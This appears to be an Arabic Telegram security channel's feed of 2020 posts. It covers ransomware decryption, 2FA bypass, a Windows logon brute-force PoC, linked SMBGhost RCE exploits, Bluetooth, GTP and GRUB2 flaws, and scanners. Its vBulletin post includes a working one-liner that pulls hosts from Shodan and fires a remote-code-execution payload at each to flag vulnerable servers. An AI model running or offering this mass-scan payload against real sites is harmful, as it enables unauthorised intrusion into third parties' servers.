كاسبرسكاي : تم فك تشفير فيروس الفدية shade بجميع إصداراته
https://twitter.com/KasperskyKSA/status/1255896865339555840?s=19
https://twitter.com/KasperskyKSA/status/1255896865339555840?s=19
Twitter
كاسبرسكي
عاجل تم فك تشفير برنامج الفدية الخبيثة #Shade بجميع اصداراته وهو الآن متوفر على موقعنا التالي: https://t.co/czBJZAPqm3
Audio
سوالف سايبر فقرة رمضانية بتقديم محمد الدوسري وعبدالرحمن بمواضيع مختلفة
موضوعنا اليوم: اختراق حسابات التواصل الاجتماعي
#فعاليات_رمضان1 #سوالف_سايبر
موضوعنا اليوم: اختراق حسابات التواصل الاجتماعي
#فعاليات_رمضان1 #سوالف_سايبر
Project Sigma - Advanced PT
سوالف سايبر فقرة رمضانية بتقديم محمد الدوسري وعبدالرحمن بمواضيع مختلفة موضوعنا اليوم: اختراق حسابات التواصل الاجتماعي #فعاليات_رمضان1 #سوالف_سايبر
شرح طرق اختراق حسابات التواصل الاجتماعي والحسابات بشكل عام من الأخ محمد الدوسري والأخ عبد الرحمن
متابعة باقي فقرات #سوالف_سايبر وباقي فعاليات رمضان على الغروب
@sec_and_hack
متابعة باقي فقرات #سوالف_سايبر وباقي فعاليات رمضان على الغروب
@sec_and_hack
مقال يشرح مبدأ عمل المصادقة الثنائية
2-Factor Authentication
وبعض الاستراتيجيات لتخطيها
https://t.co/rObGIJy2iA
2-Factor Authentication
وبعض الاستراتيجيات لتخطيها
https://t.co/rObGIJy2iA
Medium
4 Methods to Bypass two factor Authentication
Since the dawn of the World Wide Web, attackers have been involved in discovering techniques to compromise systems. Likewise security…
⚠️ تقنية جديدة تمكن من التخمين على حسابات المستخدمين في نظام ويندوز ..
بالاعتماد على LogonUserW API يمكن لأي مستخدم حتى لو كان guest ان يخمن على بيانات تسجيل الدخول لحسابات المستخدمين الآخرين من داخل الحساب .. في حين أن ذلك غير ممكن من صفحة تسجيل الدخول الاعتيادية بسبب قفل الحساب عند تجربة عدة كلمات سر خاطئة ، بينما باستخدام هذه التقنية ليس هناك أي قيود على عدد المحاولات
تم نشر تطبيق إثبات PoC على github :
https://github.com/DarkCoderSc/win-brute-logon
بالاعتماد على LogonUserW API يمكن لأي مستخدم حتى لو كان guest ان يخمن على بيانات تسجيل الدخول لحسابات المستخدمين الآخرين من داخل الحساب .. في حين أن ذلك غير ممكن من صفحة تسجيل الدخول الاعتيادية بسبب قفل الحساب عند تجربة عدة كلمات سر خاطئة ، بينما باستخدام هذه التقنية ليس هناك أي قيود على عدد المحاولات
تم نشر تطبيق إثبات PoC على github :
https://github.com/DarkCoderSc/win-brute-logon
GitHub
GitHub - PhrozenIO/win-brute-logon: Crack any Microsoft Windows users password without any privilege (Guest account included)
Crack any Microsoft Windows users password without any privilege (Guest account included) - PhrozenIO/win-brute-logon
⚠️ ثغرة أمنية جديدة في تقنية البلوتوث تسمح بعمل spoof لأحد الأجهزة المتصلة .. والتظاهر بأن جهاز المستهدف هو أحد أجهزة الطرفين
مليارات الأجهزة تم تحديدها كمصابة
https://thehackernews.com/2020/05/hacking-bluetooth-vulnerability.html
#bluetooth #spoof
مليارات الأجهزة تم تحديدها كمصابة
https://thehackernews.com/2020/05/hacking-bluetooth-vulnerability.html
#bluetooth #spoof
⚠️ هجمات APT مصدرها إيران تستهدف جهات حكومية وبنى تحتية تابعة للكويت والمملكة العربية السعودية
https://thehackernews.com/2020/05/iran-hackers-kuwait.html
#APT
https://thehackernews.com/2020/05/iran-hackers-kuwait.html
#APT
Forwarded from Project Sigma - Programming (Plus Ultra)
TheLinuxCommandLine.pdf
2 MB
هذا الكتاب يعد دليلا مثاليا لكل من يريد البدء بتعلم واتقان سطر أوامر لينكس
الكتاب من تأليف:William E. Shotts Jr.
عدد صفحات الكتاب:480.
اللغة: الانجليزية
الكتاب من تأليف:William E. Shotts Jr.
عدد صفحات الكتاب:480.
اللغة: الانجليزية
⚠️ SMBleed
ثغرة أمنية حديثة في بروتوكول SMBv3 لنظام ويندوز من اكتشاف الفريق الأمني ZecOps
CVE-2020-1206
تسمح بتسريب محتوى ذاكرة الكيرنال عن بعد Remotely
وعند ربطها مع ثغرة SMBGhost ( CVE-2020-0796 ) السابقة يمكن تنفيذ أوامر خارجية على النظام RCE
كود الاستغلال ( ربط الثغرتين RCE ) :
https://github.com/ZecOps/CVE-2020-0796-RCE-POC
كود استغلال آخر
https://github.com/chompie1337/SMBGhost_RCE_PoC
#smb #smbleed #smbghost
#windows #RCE #wormable #POC
ثغرة أمنية حديثة في بروتوكول SMBv3 لنظام ويندوز من اكتشاف الفريق الأمني ZecOps
CVE-2020-1206
تسمح بتسريب محتوى ذاكرة الكيرنال عن بعد Remotely
وعند ربطها مع ثغرة SMBGhost ( CVE-2020-0796 ) السابقة يمكن تنفيذ أوامر خارجية على النظام RCE
كود الاستغلال ( ربط الثغرتين RCE ) :
https://github.com/ZecOps/CVE-2020-0796-RCE-POC
كود استغلال آخر
https://github.com/chompie1337/SMBGhost_RCE_PoC
#smb #smbleed #smbghost
#windows #RCE #wormable #POC
This media is not supported in your browser
VIEW IN TELEGRAM
فيديو إثبات POC تم فيه استغلال الثغرتين السابقتين وإتمام RCE وفتح اتصال عكسي على نظام ويندوز 10
Forwarded from Anonymous IRAQIS
AndroBugs
~~~~~~~~
اداة تقوم بتحليل تطبيقات الاندرويد (apk) للعثور على ثغرات امنية فيها
يساعد مطورين التطبيقات او الهكر في اكتشاف الثغرات
المميزات :
- بحث عن الثغرات في تطبيق Android
- التحقق من برمجة التطبيق اذا تفتقد لشيء معين
- التحقق من اوامر shell الخطيرة مثل su
- جمع معلومات من ملايين التطبيقات
- تحقق من الحماية الامنية للتطبيق
الرابط من github :
https://github.com/AndroBugs/AndroBugs_Framework
-
اداة تقوم بتحليل تطبيقات الاندرويد (apk) للعثور على ثغرات امنية فيها
يساعد مطورين التطبيقات او الهكر في اكتشاف الثغرات
المميزات :
- بحث عن الثغرات في تطبيق Android
- التحقق من برمجة التطبيق اذا تفتقد لشيء معين
- التحقق من اوامر shell الخطيرة مثل su
- جمع معلومات من ملايين التطبيقات
- تحقق من الحماية الامنية للتطبيق
الرابط من github :
https://github.com/AndroBugs/AndroBugs_Framework
-
Forwarded from Anonymous IRAQIS
This media is not supported in your browser
VIEW IN TELEGRAM
طريقة جميلة للهندسة الاجتماعية صح؟ 😂
⚠️ اكتشاف عدة ثغرات أمنية ببروتوكول GTP الخاص بشبكة المحمول والانترنت
لشبكات 2G/3G/4G/5G
تسمح بـ :
🔸 التجسس على بيانات المستخدمين
🔸 انتحال الشخصية
🔸تساعد في عمليات الاحتيال
🔸 هجمات DoS
التفاصيل :
https://thehackernews.com/2020/06/mobile-internet-hacking.html
لشبكات 2G/3G/4G/5G
تسمح بـ :
🔸 التجسس على بيانات المستخدمين
🔸 انتحال الشخصية
🔸تساعد في عمليات الاحتيال
🔸 هجمات DoS
التفاصيل :
https://thehackernews.com/2020/06/mobile-internet-hacking.html
⚙https://github.com/future-architect/vuls
اداة مفتوحة المصدر لأنظمة Linux/FreeBSD لفحص واكتشاف الثغرات الأمنية للبرامج المثبتة على النظام
تعتمد على عدة قواعد بيانات
NVD
JVN
OVAL
RHSA/ALAS/ELSA/FreeBSD-SA.
#tools #scanner #vulnerability #Linux #FreeBSD #open_source
#ProjectSigma
اداة مفتوحة المصدر لأنظمة Linux/FreeBSD لفحص واكتشاف الثغرات الأمنية للبرامج المثبتة على النظام
تعتمد على عدة قواعد بيانات
NVD
JVN
OVAL
RHSA/ALAS/ELSA/FreeBSD-SA.
#tools #scanner #vulnerability #Linux #FreeBSD #open_source
#ProjectSigma
GitHub
GitHub - future-architect/vuls: Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language…
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices - future-architect/vuls
⚠️ اكتشاف ثغرة أمنية جديدة في GRUB2 bootloader
تسمح بتخطي ال secure boot كما يمكن استغلالها للحصول على تثبيت دائم للوصول إلى جهاز الضحية persistence
* مليارات الأجهزة حول العالم مصابة * والتي تستخدم توزيعات لينكس أو أنظمة ويندوز ( تعتمد على grub bootloader )
التفاصيل :
https://thehackernews.com/2020/07/grub2-bootloader-vulnerability.html
#grub #persistence #vulnerability #bypass #secure_boot
تسمح بتخطي ال secure boot كما يمكن استغلالها للحصول على تثبيت دائم للوصول إلى جهاز الضحية persistence
* مليارات الأجهزة حول العالم مصابة * والتي تستخدم توزيعات لينكس أو أنظمة ويندوز ( تعتمد على grub bootloader )
التفاصيل :
https://thehackernews.com/2020/07/grub2-bootloader-vulnerability.html
#grub #persistence #vulnerability #bypass #secure_boot
📂 كورسات متنوعة بحجم 36 غيغابايت ( أمن معلومات - شبكات - برمجة ...... )
منوعة بين فيديوهات وكتب
* الرابط :
https://mega.nz/folder/DFpzEJDT#awRHvUL19q1FDfR80xeXrw
#courses #security #networking #programming
#project_sigma
منوعة بين فيديوهات وكتب
* الرابط :
https://mega.nz/folder/DFpzEJDT#awRHvUL19q1FDfR80xeXrw
#courses #security #networking #programming
#project_sigma
rpcbind pentesting / enumeration [ port 111 ]
مقال يشرح طرق الاستفادة من المنفذ 111 rpcbind في جمع المعلومات عن الهدف وربما تحميل ورفع الملفات في بعض الحالات وبعض الاستغلالات الأخرى ..
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
#rpcbind #enumeration #port_111
#project_sigma
مقال يشرح طرق الاستفادة من المنفذ 111 rpcbind في جمع المعلومات عن الهدف وربما تحميل ورفع الملفات في بعض الحالات وبعض الاستغلالات الأخرى ..
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
#rpcbind #enumeration #port_111
#project_sigma
⚠️ vbulletin 0-day RCE
ثغرة vbulletin القديمة تعود من جديد ..
تحدثنا سابقاً عن ثغرة RCE في سكربت المنتديات الشهير vbulletin
CVE-2019-16759
والتي تم اكتشافها العام الماضي ونشر استغلال لها من قبل باحث مجهول ..
قامت الشركة بإصدار ترقيعات لها بعد فترة ..
حالياً تمكن باحث من إيجاد طريقة جديدة لتخطي الترقيع الأمني للثغرة وتنفيذ أوامر على النظام
- التفاصيل :
https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html
- الاستغلال :
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
- أمر لإيجاد مواقع مصابة بالاعتماد على محرك البحث shodan :
#project_sigma
ثغرة vbulletin القديمة تعود من جديد ..
تحدثنا سابقاً عن ثغرة RCE في سكربت المنتديات الشهير vbulletin
CVE-2019-16759
والتي تم اكتشافها العام الماضي ونشر استغلال لها من قبل باحث مجهول ..
قامت الشركة بإصدار ترقيعات لها بعد فترة ..
حالياً تمكن باحث من إيجاد طريقة جديدة لتخطي الترقيع الأمني للثغرة وتنفيذ أوامر على النظام
- التفاصيل :
https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html
- الاستغلال :
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
- أمر لإيجاد مواقع مصابة بالاعتماد على محرك البحث shodan :
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
#vbulletin #RCE #webapp #poc #exploit #0day#project_sigma
The Hacker News
[Unpatched] Critical 0-Day RCE Exploit for vBulletin Forum Disclosed Publicly
An anonymous hacker today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability in vBulletin.